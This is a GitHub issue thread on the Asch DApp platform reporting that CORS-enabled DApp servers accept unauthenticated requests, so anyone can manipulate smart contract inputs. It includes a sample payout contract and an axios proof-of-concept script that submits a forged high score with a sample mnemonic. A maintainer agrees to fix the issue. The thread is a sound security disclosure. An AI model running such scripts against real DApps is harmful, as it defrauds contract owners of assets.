Contracts insecure due to same-origin policy

[bassjobsen]

As far as i do understand Dapp run on a express server, with the cors middleware enabled, see also https://github.com/AschPlatform/asch/blob/master/src/init.js#L166.

As already described at https://github.com/bassjobsen/howto-asch-docs/blob/master/use-assets.md, and asked at https://stackoverflow.com/questions/51603087/how-to-guarantee-that-the-input-of-the-smart-contract-is-not-manipulated, PUT (same for POST, GET etc too) requests to the Dapp from anywhere are allowed.

The above means that input values for the (smart) contract of a Dapp can be manipulated.

For instance my contract winner.js may look like:

module.exports = {
  winner: async function(score) {

    if (score > 100) {
	  //pay the user some assests because his score is higher then 100
        } 
  } 
}

Now everyone can run the following script to get some assest and be an winner:

const axios = require('axios');
var fee = '10000000'
var data = {
        secret: "acquire paper fun spice celery design able shrimp lunch angry alter gather",
	fee: fee,
         type: 1001, //the number for winner.winner
         args: 1000 // a very high score
         }
axios.put('http://localhost:4096/api/dapps/ee0c22de321610bbc5698243d66f5122a20d2b1b1d534ee4f636165e1b6cd6f6/transactions/unsigned',data)
  .then(function (response) {
    console.log(response);
  })
  .catch(function (error) {
    console.log(error);
  })
  .then(function () {
    // always executed
  });

I believe that CORS can be useful for testing purposes, but it should be disabled for production (mainnet) at least.

[liangpeili]

That's an very import security issue. We need to remove it in asch-sandbox @sqfasd